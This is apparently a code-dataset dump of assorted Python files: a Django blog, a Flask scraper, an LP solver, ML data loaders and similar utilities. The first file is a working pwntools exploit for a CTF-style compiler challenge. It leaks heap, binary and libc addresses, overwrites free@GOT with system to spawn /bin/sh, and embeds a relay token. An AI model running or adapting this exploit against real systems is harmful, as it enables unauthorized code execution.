id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
6434336 | from pwn import *
PROGNAME = "./geelang-compiler"
if args.REMOTE:
p = process(["./cli-relay", "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNhZmZAZ2VlZ2xlLm9yZyIsInNlcnZpY2UiOiJ1YmVycHJveHlAc2VydmljZXMuZ2VlZ2xlLm9yZyIsImV4cCI6MTU3NTE0OTgwMn0.p-lpYOJ6RaImmd7HXm66pfZsUkk_Vbp206dDOqPSCzF0xuNEC6wDSeesh8ku_xMge_lbxEE9EzVzRBGpU92v5rVdiosjWT2oJP8ooSvatD3OcE8iZ3GFQpJZimUSMF6XigteUKxlAtKXjm8jg4NDQtVdXm5WQK3rSjvdOrzpoeU3kykIq6_Jmulv48a1bGLCaoetq55S-PL57rTrDwDsU6LqntJyQEDU15BO9ek9vZTDlDSs7TvyDp1UtAYZiWjx5qhgSOYqjmuMN9weTC8WAQJBdrMBzKWSfRD4CWozSfMvpazVMJcfqp-G9LKM64iW1m30Fnl_OYTM4NtHMrL4tRLGSfjPqptcd1GIYar3lxU5ka5161rSq-XSMLPVdbR7cRw1HVCz-Qbh2pxnp01DeA70Dm6rNvOhUglqHAnoNmajCUj7FxsGGHvnDOCwS7W8nAAVy1ctBfWf5fdR5a1VhTAoxLfYXXYNqi2uWPDQp5unraS1Ck35ZQKCbIo3gbT8IkbzSwO89ZTJwcs79nGRIlV9pQl1AWpKK-o8AeKBI-S65RZ-VcdcJX7MaCzun-7kZoD0ceF088Y9wSTUF7vpiTolop58qStey9ptdrz74RokJulS8u1n7WCnLL8kdairsyJkmsPA4O8q7bvtuANFMXQjO1bPxXjSbf7BOWUYyok", "geelang.corp.geegle.org"])
elf = ELF(PROGNAME)
else:
p = process(PROGNAME)
elf = p.elf
libc = ELF("./libc.so.6")
pause()
GETSHELL = '''
INT a 99
DEL a
BOX b 1 # Create boxed/unboxed overlap
PRINT a # Leak Heap chunk
INT z 24
SUB a z
PRINT b # Leak Binary (print_int) Address
SET z {}
MOV a b
SUB a z # Offset to binary base
PRINT a
SET z {}
ADD a z # Offset to free GOT entry
PRINT a
PRINT b # Leak free@GOT
INT SYSTEM 0
SET z {}
MOV SYSTEM b
SUB SYSTEM z # Offset to libc base
SET z {}
ADD SYSTEM z # Offset to system
PRINT SYSTEM
MOV b SYSTEM
SET a {} # /bin/sh
DEL a
END
'''.format(elf.symbols["print_int"],
elf.got["free"],
libc.symbols["free"],
libc.symbols["system"],
u64("/bin/sh\x00")
)
print GETSHELL
pause()
p.sendline(GETSHELL)
p.interactive()
| StarcoderdataPython |
3598328 | from msdi_io import *
class batchLoader():
def __init__(self,batch_size,path_msdi,max_size=30712):
self.i = 0
self.batch_size= batch_size
self.path_msdi = path_msdi
self.max_size = max_size
self.msdi = get_msdi_dataframe(msdi_path)
def load(self,batch_nb,img_size):
batch_size = min(self.i+self.batch_size,self.max_size)
X = []
y = []
#on charge directement le batch
entry_idx=np.arange(batch_nb*batch_size,batch_size*(1+batch_nb))
one_entry = self.msdi.loc[entry_idx]
#print(one_entry)
for index,row in one_entry.iterrows():
mfcc = load_mfcc(row, self.path_msdi)[:200]
genre = get_label(row)
if len(mfcc) < 200:
print("donnee trop courte (refusee) de type :",genre)
continue
img = load_img(row, self.path_msdi)
deep_features = load_deep_audio_features(row, self.path_msdi)
y.append(genre)
data = np.hstack([mfcc.reshape(-1),img.reshape(-1),deep_features.reshape(-1)])
X.append(data)
return np.array(X),y
def loadBatch(self):
batch_size = min(self.i+self.batch_size,self.max_size)
X = []
y = []
for i_batch in range(batch_size):
entry_idx = self.i + i_batch
one_entry = self.msdi.loc[entry_idx]
mfcc = load_mfcc(one_entry, self.path_msdi)[:200]
genre = get_label(one_entry)
if len(mfcc) < 200:
print("donnee trop courte (refusee) de type :",genre)
continue
img = load_img(one_entry, self.path_msdi)
deep_features = load_deep_audio_features(one_entry, self.path_msdi)
y.append(genre)
data = np.hstack([mfcc.reshape(-1),img.reshape(-1),deep_features.reshape(-1)])
X.append(data)
self.i += i_batch
return np.array(X),y
if __name__ == '__main__':
print('Labels:', get_label_list())
bl = batchLoader(100,path_msdi=msdi_path)
for i in range(10):
X,y=bl.load(i)
print(X.shape,len(y))
#print(X[1])
""" print('Labels:', get_label_list())
bl = batchLoader(100,path_msdi=msdi_path)
for i in range(10):
for batch in bl.loadBatch():
X,y = batch[0],batch[1]
print()
print(X[1])
"""
| StarcoderdataPython |
3339970 | """
-- UnmaintableCode: C Module --
Author: @CosasDePuma <<EMAIL>>(https://github.com/cosasdepuma)
"""
# pylint: disable=too-few-public-methods, no-self-use, unused-argument, dangerous-default-value
import re
from random import randint
class Module:
""" Rename variables to _ or __ """
def __init__(self, variables):
self.head = ''
self.variables = variables
def run_(self, code, args={'n': 3}):
""" n: Number of variables to rename """
for i in range(args['n']):
changed = self.variables[randint(0, len(self.variables) - 1)]
code = re.sub('\\b{}\\b'.format(changed), '_' * (i + 1), code)
return self.head, code
| StarcoderdataPython |
1842945 | from sqlalchemy.orm import relationship
from db import db
import datetime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Comments(db.Model,Base):
id = db.Column(db.Integer, primary_key = True)
publishedOn = db.Column(db.DateTime(),nullable =False, default=datetime.datetime.utcnow)
content = db.Column(db.Text(), nullable = False)
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'),nullable=False)
post = relationship("Posts",viewonly=True)
user_id = db.Column(db.Integer,db.ForeignKey('users.id'),nullable=False)
user = relationship("UserModel", viewonly=True)
def __init__(self,content,publishedOn,post_id,user_id) -> None:
self.content = content
self.publishedOn = publishedOn
self.post_id = post_id
self.user_id = user_id
super().__init__()
def save_to_db(self):
db.session.add(self)
db.session.commit() | StarcoderdataPython |
4881203 | <reponame>leighmforrest/frankenblog
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
from django.core.exceptions import PermissionDenied
from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin
from django.contrib import messages
from django.shortcuts import redirect
from blog.models import Post
from blog.forms import CommentForm, PostForm
class PostListView(ListView):
template_name = 'pages/home.html'
context_object_name = 'posts'
model = Post
class PostDetailView(DetailView):
template_name = 'blog/detail.html'
model = Post
context_object_name = 'post'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
if self.request.user and self.request.user.is_authenticated:
context['form'] = CommentForm()
return context
class PostCreateView(PermissionRequiredMixin, CreateView):
template_name = 'blog/create.html'
model = Post
form_class = PostForm
permission_required = 'blog.can_create_post'
def form_valid(self, form):
form.instance.author = self.request.user.author.first()
return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, UpdateView):
template_name = 'blog/update.html'
model = Post
form_class = PostForm
context_object_name = 'post'
def dispatch(self, request, *args, **kwargs):
obj = self.get_object()
if obj.author.author != self.request.user:
raise PermissionDenied
return super().dispatch(request, *args, **kwargs)
class CommentCreateView(LoginRequiredMixin, CreateView):
form_class = CommentForm
http_method_names = ['post']
def form_invalid(self, form):
post = Post.objects.get(pk=self.kwargs['pk'])
messages.error(self.request, 'Comment not created.')
return redirect(post.get_absolute_url())
def form_valid(self, form):
post = Post.objects.get(pk=self.kwargs['pk'])
comment = form.save(commit=False)
comment.user = self.request.user
comment.post = post
comment.save()
return super().form_valid(form)
| StarcoderdataPython |
3599230 | from flask import Flask, render_template, redirect, jsonify
from flask_pymongo import PyMongo
import scrape_mars
#Create an instance of Flask
app = Flask(__name__)
#Use PyMongo to establish mongo connection
mongo = PyMongo(app, uri="mongodb://localhost:27017/mars_app")
@app.route("/")
def home():
mars_collection = mongo.db.mars_collection.find_one()
return render_template("index.html", mars_collection=mars_collection)
@app.route("/scrape")
def scraper():
mars_collection = mongo.db.mars_collection
mars_data = scrape_mars.scrape_info()
mars_collection.update({}, mars_data, upsert=True)
return redirect("/", code=302)
if __name__ == "__main__":
app.run(debug=True)
| StarcoderdataPython |
253918 | from __future__ import absolute_import, division, print_function
import os
import sys
sys.path.append('/'.join([os.environ['_CIOP_APPLICATION_PATH'], 'util']))
sys.path.append('../util')
import numpy as np
import gdal
import osr
import urllib.parse as urlparse
import pandas as pd
import datetime
from vam.whittaker import ws2d, ws2doptv, ws2doptvp, lag1corr
from itertools import chain
import cioppy
import array
import geopandas as gpd
def get_vsi_url(enclosure, user, api_key):
parsed_url = urlparse.urlparse(enclosure)
url = '/vsicurl/%s://%s:%s@%s/api%s' % (list(parsed_url)[0],
user,
api_key,
list(parsed_url)[1],
list(parsed_url)[2])
return url
def analyse_row(row):
series = dict()
series['day'] = ''.join(row['startdate'].split('T')[0].split('-'))
series['jday'] = '{}{}'.format(datetime.datetime.strptime(series['day'], '%Y%m%d').timetuple().tm_year,
"%03d"%datetime.datetime.strptime(series['day'], '%Y%m%d').timetuple().tm_yday)
series['col-row'] = '{}-{}'.format(row['title'].split('C:')[1][:2],row['title'].split('R:')[1][:2])
return pd.Series(series)
def analyse_gps(row, user, api_key ,land_mask_band):
# machine_epsilone=np.finfo(float).eps
enclosure_vsi_url = get_vsi_url(row.enclosure,
user,
api_key)
data_gdal = gdal.Open(enclosure_vsi_url)
ulx, xres, xskew, uly, yskew, yres = data_gdal.GetGeoTransform()
lrx = ulx + (data_gdal.RasterXSize * xres)
lry = uly + (data_gdal.RasterYSize * yres)
land_mask=np.array(data_gdal.GetRasterBand(land_mask_band).ReadAsArray(), dtype= np.uint8)
land_covered=(land_mask==1).sum()/land_mask.size
series = dict()
series['ul_x'] = ulx
series['ul_y'] = uly
series['lr_x'] = lrx
series['lr_y'] = lry
series['data_content'] = land_covered
return pd.Series(series)
def fromjulian(x):
"""
Parses julian date string to datetime object.
Args:
x: julian date as string YYYYJJJ
Returns:
datetime object parsed from julian date
"""
return datetime.datetime.strptime(x, '%Y%j').date()
def generate_dates(startdate_string=None, enddate_string=None, delta=5):
"""
Generates a list of dates from a start date to an end date.
Args:
startdate_string: julian date as string YYYYJJJ
enddate_string: julian date as string YYYYJJJ
delta: integer timedelta between each date
Returns:
list of string julian dates YYYYJJJ
"""
startdate = datetime.datetime.strptime(startdate_string, '%Y%j').date()
enddate = datetime.datetime.strptime(enddate_string, '%Y%j').date()
date_generated = [startdate + datetime.timedelta(days=x) for x in range(0, (enddate-startdate).days+delta, delta)]
datelist = ['{}{:03d}'.format(x.year, x.timetuple().tm_yday) for x in date_generated]
return datelist
def whittaker(ts, date_mask):
"""
Apply the whittaker smoothing to a 1d array of floating values.
Args:
ts: array of floating values
date_mask: full list of julian dates as string YYYYJJJ
Returns:
list of floating values. The first value is the s smoothing parameter
"""
nan_value = 255
ts_double=np.array(ts,dtype='double')
mask = np.ones(len(ts))
mask[ts==nan_value]=0
# the output is an array full of np.nan by default
data_smooth = np.array([nan_value]*len(date_mask))
# check if all values are np.npn
if np.sum(mask)>0:
w=np.array((ts!=nan_value)*1,dtype='double')
lrange = array.array('d', np.linspace(-2, 4, 61))
try:
# apply whittaker filter with V-curve
zv, loptv = ws2doptvp(ts_double, w, lrange, p=0.90)
#parameters needed for the interpolation step
dvec = np.zeros(len(date_mask))
w_d=np.ones(len(date_mask), dtype='double')
# adding new dates with no associated product to the weights
for idx, el in enumerate(date_mask):
if not el:
w_d[idx]= 0
dvec[w_d==1]= zv
# apply whittaker filter with very low smoothing to interpolate
data_smooth = ws2d(dvec, 0.0001, w_d)
# Calculates Lag-1 correlation
lag1 = lag1corr(ts_double[:-1], ts_double[1:], nan_value)
except Exception as e:
loptv = 0
lag1 = nan_value
print(e)
print(mask)
else:
loptv = 0
lag1 = nan_value
return tuple(np.append(np.append(loptv,lag1), data_smooth))
| StarcoderdataPython |
4886570 | <filename>api/services/vote_service.py
from django.http import HttpResponse, JsonResponse
from rest_framework import serializers
from api.services.home_service import error
from repository.repos import Vote
from api.dto.vote_dto import VoteSerializer
def votes(request):
data = Vote.get_all()
serializer = VoteSerializer(data, many=True)
return JsonResponse(serializer.data, safe=False)
| StarcoderdataPython |
11356879 | <gh_stars>1-10
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import io
from setuptools import setup, find_packages
setup(
name="django-expenses",
version="0.5.0",
description="A comprehensive system for managing expenses",
keywords="django,expenses",
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/Kwpolska/django-expenses",
license="3-clause BSD",
long_description=io.open("./README.rst", "r", encoding="utf-8").read(),
platforms="any",
zip_safe=False,
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Framework :: Django",
"License :: OSI Approved :: BSD License",
"Topic :: Office/Business :: Financial",
],
packages=find_packages(),
install_requires=["Django>=2.1", "Babel", "pygal", "django-oauth-toolkit", "iso8601", "attrs"],
)
| StarcoderdataPython |
310250 | from kratos import Interface
class GlbConfigInterface(Interface):
def __init__(self, addr_width: int, data_width: int):
Interface.__init__(self, f"glb_cfg_ifc_A_{addr_width}_D_{data_width}")
# Local variables
self.wr_en = self.var("wr_en", 1)
self.wr_addr = self.var("wr_addr", addr_width)
self.wr_data = self.var("wr_data", data_width)
self.rd_en = self.var("rd_en", 1)
self.rd_addr = self.var("rd_addr", addr_width)
self.rd_data = self.var("rd_data", data_width)
self.rd_data_valid = self.var("rd_data_valid", 1)
m_to_s = [self.wr_en, self.wr_addr,
self.wr_data, self.rd_en, self.rd_addr]
s_to_m = [self.rd_data, self.rd_data_valid]
self.master = self.modport("master")
self.slave = self.modport("slave")
for port in m_to_s:
self.master.set_output(port)
self.slave.set_input(port)
for port in s_to_m:
self.master.set_input(port)
self.slave.set_output(port)
| StarcoderdataPython |
4985008 | # -*- coding: utf-8 -*-
"""Helper utilities and decorators."""
import importlib
import uuid
from flask import flash, jsonify
from cartunningservice.constants.http_status_codes import STATUS_CODES
def flash_errors(form, category='warning'):
"""Flash all errors for a form."""
for field, errors in form.errors.items():
for error in errors:
flash('{0} - {1}'.format(getattr(form, field).label.text, error), category)
def response(payload, meta=None, status_code=200, message=None):
"""
:param payload: {list|dict|str} response payload
:param status_code: {int} http response status code
:param message: {str} string message
"""
# check validity of status code
if status_code not in STATUS_CODES:
raise Exception('Status code does not exist.')
res = {
'meta': {
'code': status_code,
'message': STATUS_CODES[status_code] if not message else message
},
'data': payload
}
if meta is not None:
res['meta'].update(meta)
return jsonify(res), status_code
def underscore_to_camelcase(value):
"""
Transformation string from underscore to camelcase
:param value: {str} underscored string
:return: {str} camelcased string
"""
def camelcase():
yield str.lower
while True:
yield str.capitalize
c = camelcase()
value = "".join(c(x) if x else '_' for x in value.split("_"))
return value[0].upper() + value[1:]
def generate_uuid():
"""
Generate new uuid
:return: {string} uuid
"""
return str(uuid.uuid4())
| StarcoderdataPython |
4911678 | <gh_stars>0
#AOJ_rowの.pyファイル達を一つのテキストファイルにするコード
#python3 yomikaki.py >> aoj_row.txt
import glob
from tqdm import tqdm
import csv
# input_files = glob.glob("/Users/t_kajiura/AOJ_raw/*.py")
#AOJ_rowの.pyファイル達を一つのテキストファイルにするコード
def pytotxt(input_files):
for input_file in input_files:
with open(f'{input_file}_pytorch_tutorial.txt', "w") as my_output_file: #毎回変更
print(input_file)
with open(input_file) as my_input_file:
# for line in f:
tunagu= []
for i,line in enumerate(my_input_file):
#もし改行だけであればbreakをする。処理をここに書いた方が良かった...mask.pyに書いてしまった。。今後必要であれば移動します。
line.rstrip('#')
line.lstrip() #文字列の冒頭の空白文字だけを取り除く
line.rstrip() #同じく末尾の空白文字だけを取り除く
tunagu.append(line[:-1])
s = '\n'.join(tunagu)
my_output_file.write(s)
my_output_file.close()
def commentout(input_files):
# for i in range(1, 7):#ファイル名数えるだけ #毎回変更
# with open(f"mae_{input_file}", "w") as my_output_file: #毎回変更
for input_file in input_files:
with open(f"{input_file}_mae.txt", "w") as my_output_file: #毎回変更
print(input_file)
with open(input_file) as my_input_file:
sentence = []
for i,line in enumerate(my_input_file):
if line.startswith("#")==True:
pass
else:
if line == "\n":
pass
else:
sentence.append(line[:-1])
s = '\n'.join(sentence)
my_output_file.write(s)
my_output_file.close()
def sakujyo(input_files):#先頭と末尾のダブルクォーテーションを削除する Codex
for input_file in input_files:
with open(f'{input_file}_out.tsv', mode='w') as my_output_file:
with open(input_file) as my_input_file:
# print(input_file)
reader = csv.reader(my_input_file, delimiter='\t')
for row in reader:
# print(row)
for line in row:
# line = line.split('\\').split('n').split('\n').split('\'')
# line = line.replace("\\","").replace("n","").replace("\n","").replace("\'","")
line = line.lstrip('"')
line = line.rstrip('"')
# line = line.split('\\')
# line = "".join(line)
# line = line.split('n')
# line = "".join(line)
# line = line.split('\n')
# line = "".join(line)
# line = line.split('\'')
# line = "".join(line)
# line = line.split('\n')
my_output_file.write(line)
my_output_file.close()
input_files_tsv = glob.glob("")
def tsvtotxt(csv_file):
with open(csv_file, "r") as my_input_file:
with open(f'{csv_file}.txt', "w") as my_output_file:
[ my_output_file.write(" ".join(row)+'\n') for row in csv.reader(my_input_file)]
my_output_file.close()
input_files_tsv = glob.glob("/Users/t_kajiura/Git/add_training/input_file/codex_out/*.tsv")
for csv_file in tqdm(input_files_tsv):#毎回変更
print(csv_file)
tsvtotxt(csv_file)
## ここ実行部分だよ---------------------------
# input_files_py = glob.glob("/Users/t_kajiura/Git/add_training/tutorials/*.py")#毎回変更
# input_files_txt = glob.glob("/Users/t_kajiura/Git/add_training/torchdata.txt")#毎回変更
# input_codes_txt = glob.glob("/Users/t_kajiura/Git/add_training/codexdata/python_train_*_out.tsv")#毎回変更
# # for input_file in tqdm(input_files_py):#毎回変更
# # # i = i+2
# # print(input_file)
# # pytotxt(input_files_py)
# commentout(input_files_txt)
# # sakujyo(input_codes_txt)
#自分用手順メモ1224---------------------------
# チュートリアルからダウンロードした.ipynbを[jupyter nbconvert --to python XXX.ipynb]で.pyに変換
# .pyをpytotxt(input_files)を.txtに変換
# .txtは日本語のコメント文をシャープにしてくれるので正規表現で#右側を取り除く
#------------------------------------------- | StarcoderdataPython |
9727717 | # -*- coding: utf-8 -*-
"""
NotiHub
Copyright 2017 <NAME> <<EMAIL>>
Unofficial Facebook Chat API for Python [https://github.com/carpedm20/fbchat]
Unofficial Facebook Chat API [https://github.com/Schmavery/facebook-chat-api]
The following code is licensed under the MIT License
"""
import fbchat
from .__stub__ import Service
fbchat.log.disabled = True
class service(Service):
__VERSION__ = "0.0.1"
__NAME__ = "MESSENGER"
class Messenger(fbchat.Client):
def __init__(self, parent, *args):
super().__init__(*args)
parent.id = (parent.__NAME__, self.uid)
self.dbWriter = parent.dbWriter
def registerOnMessage(self, function):
self.handler = function
def onMessage(self, ts, thread_id, author_id, message, thread_type, **kwargs):
if message:
self.dbWriter(ts, thread_id, author_id, message)
if self.uid != author_id: self.handler(
lambda thread_id, message: self.sendMessage(message, thread_id=thread_id, thread_type=thread_type),
ts, thread_id, author_id, message)
def connect(self):
self.messenger = self.Messenger(self, *self.config.getAuth())
self.messenger.registerOnMessage(self.config.handler)
self.listen()
def send(self, thread, data):
if self.config.send:
thread_type = fbchat.ThreadType.GROUP if self.messenger.graphql_request(
fbchat.GraphQL(doc_id='1386147188135407', params={
'id': thread,
'message_limit': 0,
'load_messages': False,
'load_read_receipts': False,
'before': None
})).get("thread_type") == "GROUP" else fbchat.ThreadType.USER
return self.messenger.sendMessage(data, thread_id=thread, thread_type=thread_type)
def listen(self):
if self.config.receive: self.messenger.listen()
def stopListen(self):
self.messenger.stopListening()
| StarcoderdataPython |
1891137 | from __future__ import annotations
from typing import cast
from coredis._utils import EncodingInsensitiveDict
from coredis.response._callbacks import ResponseCallback
from coredis.response._utils import flat_pairs_to_dict
from coredis.response.types import LibraryDefinition
from coredis.typing import (
AnyStr,
Dict,
List,
Mapping,
Optional,
ResponsePrimitive,
ResponseType,
Union,
ValueT,
)
class FunctionListCallback(
ResponseCallback[
List[ResponseType], List[ResponseType], Mapping[str, LibraryDefinition]
]
):
def transform(
self, response: List[ResponseType], **options: Optional[ValueT]
) -> Mapping[str, LibraryDefinition]:
libraries = [
EncodingInsensitiveDict(flat_pairs_to_dict(cast(List[ValueT], library)))
for library in response
]
transformed = EncodingInsensitiveDict()
for library in libraries:
lib_name = library["library_name"]
functions = EncodingInsensitiveDict({})
for function in library.get("functions", []):
function_definition = EncodingInsensitiveDict(
flat_pairs_to_dict(function)
)
functions[function_definition["name"]] = function_definition
functions[function_definition["name"]]["flags"] = set(
function_definition["flags"]
)
library["functions"] = functions
transformed[lib_name] = EncodingInsensitiveDict(
LibraryDefinition(
name=library["name"],
engine=library["engine"],
description=library["description"],
functions=library["functions"],
library_code=library["library_code"],
)
)
return transformed
class FunctionStatsCallback(
ResponseCallback[
List[ResponseType],
Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]],
Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]],
]
):
def transform(
self,
response: List[ResponseType],
**options: Optional[ValueT],
) -> Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]]:
transformed = flat_pairs_to_dict(response)
key = cast(AnyStr, b"engines" if b"engines" in transformed else "engines")
engines = flat_pairs_to_dict(cast(List[AnyStr], transformed.pop(key)))
engines_transformed = {}
for engine, stats in engines.items():
engines_transformed[engine] = flat_pairs_to_dict(cast(List[AnyStr], stats))
transformed[key] = engines_transformed # type: ignore
return cast(
Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]],
transformed,
)
def transform_3(
self,
response: Dict[
AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]
],
**options: Optional[ValueT],
) -> Dict[AnyStr, Union[AnyStr, Dict[AnyStr, Dict[AnyStr, ResponsePrimitive]]]]:
return response
| StarcoderdataPython |
128420 | <filename>utils/__init__.py
import utils.tokenizer
import utils.colouring | StarcoderdataPython |
229186 | # -*- coding: utf-8 -*-
"""
Class: LinearProgramming
"""
import numpy as np
import gurobipy as gp
class LinearProgramming():
"""
LinearProgramming defines and solves a LP problem.
"""
def __init__(self, *args):
"""
__init__ creates a LP problem.
"""
try:
problem_configuration = self._listtodict(list(args))
except SyntaxError:
print("Syntax error in the configuration of the LP problem.\n")
if ("cmax" in problem_configuration.keys())\
and ("cmin" not in problem_configuration.keys()):
self.minimize_problem = False
self.costfunction_matrix = -problem_configuration.get("cmax")
elif ("cmin" in problem_configuration.keys())\
and ("cmax" not in problem_configuration.keys()):
self.minimize_problem = True
self.costfunction_matrix = problem_configuration.get("cmin")
else:
self.costfunction_matrix = None
if "ineq_a" in problem_configuration.keys():
self.inequality_constraint_a = problem_configuration.get("ineq_a")
else:
self.inequality_constraint_a = None
if "ineq_b" in problem_configuration.keys():
self.inequality_constraint_b = problem_configuration.get("ineq_b")
else:
self.inequality_constraint_b = None
if "lb" in problem_configuration.keys():
self.lower_bound = problem_configuration.get("lb")
else:
self.lower_bound = None
if "ub" in problem_configuration.keys():
self.upper_bound = problem_configuration.get("ub")
else:
self.upper_bound = None
self.consistency_flag = False
self.canonical_flag = False
# Variables used in the class
self.canonical_max_kpi = None
self.canonical_inequality_constraint_a = None
self.canonical_inequality_constraint_b = None
self.gurobi_lp_model = None
self.gurobi_lp_variable = None
self.optimum_x = None
self.optimum_y = None
def reset_costfunction_matrix(self, *args):
"""
reset_costfunction_matrix resets the cost function matrix of the LP problem.
"""
try:
problem_configuration = self._listtodict(list(args))
except SyntaxError:
print("Syntax error in the configuration of the LP problem.\n")
if ("cmax" in problem_configuration.keys())\
and ("cmin" not in problem_configuration.keys()):
self.minimize_problem = False
self.costfunction_matrix = -problem_configuration.get("cmax")
elif ("cmin" in problem_configuration.keys())\
and ("cmax" not in problem_configuration.keys()):
self.minimize_problem = True
self.costfunction_matrix = problem_configuration.get("cmin")
else:
self.costfunction_matrix = None
self.minimize_problem = None
self.consistency_flag = False
self.canonical_flag = False
def reset_inequality_constraint_a(self, inequality_constraint_a):
"""
reset_inequality_constraint_a resets the inequality constraint a
"""
self.inequality_constraint_a = inequality_constraint_a
self.consistency_flag = False
self.canonical_flag = False
def reset_inequality_constraint_b(self, inequality_constraint_b):
"""
reset_inequality_constraint_b resets the inequality constraint b
"""
self.inequality_constraint_b = inequality_constraint_b
self.consistency_flag = False
self.canonical_flag = False
def reset_lower_bound(self, lower_bound):
"""
reset_lower_bound resets the lower bound of the LP problem.
"""
self.lower_bound = lower_bound
self.consistency_flag = False
self.canonical_flag = False
def reset_upper_bound(self, upper_bound):
"""
reset_upper_bound resets the upper bound of the LP problem.
"""
self.upper_bound = upper_bound
self.consistency_flag = False
self.canonical_flag = False
@classmethod
def _listtodict(cls, input_lst):
"""
_listtodict converts an input list to a dictionary.
"""
output_op = {input_lst[i]: input_lst[i + 1] for i in range(0, len(input_lst), 2)}
return output_op
def _check_consistency(self):
"""
Check input consistency
"""
consistency_flag = True
# Check cost function and inequality matrix size constraint consistency.
if self.costfunction_matrix is not None:
variable_length = len(self.costfunction_matrix)
if (self.inequality_constraint_a is not None)\
and (self.inequality_constraint_b is not None):
inequality_constraint_length = len(self.inequality_constraint_b)
if self.inequality_constraint_a.shape[1] == variable_length:
pass
else:
print("The number of variables is not consistent\
in the cost function and in the inequality constraint.\n")
consistency_flag = False
if self.inequality_constraint_a.shape[0] == inequality_constraint_length:
pass
else:
print("The number of inequality constraint number is not consistent\
in ineq_a and ineq_b.\n")
consistency_flag = False
else:
print("The inequality constraint is not defined\
for the LP problem.\n")
consistency_flag = False
else:
print("The cost function matrix is not defined for the LP problem.\n")
consistency_flag = False
# Check upper bound and lower bound consistency.
if consistency_flag:
if self.upper_bound is not None:
if len(self.upper_bound) == variable_length:
pass
else:
print("The number of variables is not consistent\
in the cost function and in the upper bound setup\
for the LP problem.\n")
if self.lower_bound is not None:
if len(self.lower_bound) == variable_length:
pass
else:
print("The number of variables is not consistent\
in the cost function and in the lower bound setup\
for the LP problem.\n")
# Set flag
self.consistency_flag = consistency_flag
self.canonical_flag = False
def _form_canonical(self):
"""
_form_canonical forms the LP problem into canonical form.
"""
if self.consistency_flag:
variable_length = len(self.costfunction_matrix)
self.canonical_max_kpi = -self.costfunction_matrix
self.canonical_inequality_constraint_a = self.inequality_constraint_a
self.canonical_inequality_constraint_b = self.inequality_constraint_b
if self.upper_bound is not None:
self.canonical_inequality_constraint_a = np.concatenate(\
(self.canonical_inequality_constraint_a, \
np.identity(variable_length)), axis = 0)
self.canonical_inequality_constraint_b = np.concatenate(\
(self.canonical_inequality_constraint_b, \
self.upper_bound), axis = 0)
if self.lower_bound is not None:
self.canonical_inequality_constraint_a = np.concatenate(\
(self.canonical_inequality_constraint_a, \
-np.identity(variable_length)), axis = 0)
self.canonical_inequality_constraint_b = np.concatenate(\
(self.canonical_inequality_constraint_b, \
self.lower_bound), axis = 0)
self.canonical_flag = True
else:
print("The LP problem has not passed consistency check yet.\n")
def solve_gurobi(self):
"""
solve_gurobi solves the LP problem using gurobipy.model()
"""
self._check_consistency()
self._form_canonical()
if self.consistency_flag and self.canonical_flag:
variable_length = len(self.costfunction_matrix)
self.gurobi_lp_model = gp.Model()
self.gurobi_lp_model.Params.LogToConsole = 0
self.gurobi_lp_variable = self.gurobi_lp_model.addMVar(variable_length)
self.gurobi_lp_model.setMObjective(None, self.canonical_max_kpi, 0.0, \
None, None, self.gurobi_lp_variable, \
gp.GRB.MAXIMIZE)
self.gurobi_lp_model.addConstr(self.canonical_inequality_constraint_a \
@ self.gurobi_lp_variable <= \
self.canonical_inequality_constraint_b.transpose()[0]) # pylint: disable=line-too-long
self.gurobi_lp_model.update()
self.gurobi_lp_model.optimize()
self.optimum_x = self.gurobi_lp_variable.x
self.optimum_y = self.gurobi_lp_model.objVal
else:
print("The LP problem has not passed consistency check\
or formed into a canonical form yet.\n")
def display_result(self):
"""
display_result displays the result of the LP problem
"""
print("The optimum x variables are: \n")
print(self.optimum_x)
print("\n")
if self.minimize_problem:
print("The cost function value is: \n")
print(-self.optimum_y)
elif not self.minimize_problem:
print("The likelihood function value is: \n")
print(self.optimum_y)
print("\n")
| StarcoderdataPython |
3415290 | import tetris_blocks
import numbersforscore
import color
class NumberToBlock:
@staticmethod
def get_block(number: int):
numbers_list = NumberToBlock.get_list_of_single_numbers(number)
blocks = []
for number in numbers_list:
block = numbersforscore.NumbersForScore.number[number]
blocks.append(block)
# Create Empty Array...
field = NumberToBlock.create_number_field(blocks)
single_block_width = len(blocks[len(blocks) - 1])
for block_index in range(len(blocks)):
for line_index in range(len(blocks[block_index])):
for pos_index in range(len(blocks[block_index])):
pos = blocks[block_index][line_index][pos_index]
field_x = line_index
field_y = block_index * single_block_width + pos_index
field[field_x][field_y] = pos
return tetris_blocks.Block([field] * 4, color.BlockColor.red)
@staticmethod
def create_number_field(blocks):
single_block_width = len(blocks[len(blocks) - 1])
field = []
for line in range(single_block_width):
line = []
for line_pos in range(0, len(blocks) * single_block_width):
line.append(0)
field.append(line)
return field
@staticmethod
def get_list_of_single_numbers(number: int):
numbers_list = [number // 1000 % 10, number // 100 % 10, number // 10 % 10, number % 10]
return numbers_list
if __name__ == "__main__":
block = NumberToBlock.get_block(1234)
block.draw_block()
| StarcoderdataPython |
9705617 | from functools import partial
from typing import Union, Dict, Optional
from http_async_client.enums import SupportedProtocols, Methods
import httpx
import re
from dataclasses import dataclass
from httpx._types import RequestContent, URLTypes, RequestData, RequestFiles, QueryParamTypes, HeaderTypes, CookieTypes
from nanoid import generate
import base64
import threading
from httpx import Request
class EndPointRegistry(type):
